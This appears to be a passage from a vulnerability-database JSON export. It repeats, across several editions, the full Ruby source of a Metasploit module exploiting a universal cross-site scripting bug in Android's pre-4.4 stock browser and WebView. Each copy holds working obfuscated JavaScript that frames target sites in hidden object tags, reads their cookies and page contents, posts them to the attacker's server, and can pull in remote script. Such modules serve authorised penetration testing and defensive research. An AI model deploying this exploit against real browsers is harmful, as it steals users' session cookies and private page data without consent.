If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-27T00:43:53", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-10T17:05:42", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-05-10T17:05:42", "differentElements": ["modified", "published"], "edition": 40}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-10T19:04:33", "history": [], "viewCount": 56, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-05-10T19:04:33", "differentElements": ["modified", "published"], "edition": 41}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-06-01T19:44:00", "history": [], "viewCount": 56, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-06-01T19:44:00", "differentElements": ["modified", "published"], "edition": 42}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-06-01T21:52:28", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-06-01T21:52:28", "differentElements": ["modified", "published"], "edition": 43}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
"This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-01T02:57:52", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-01T02:57:52", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": 
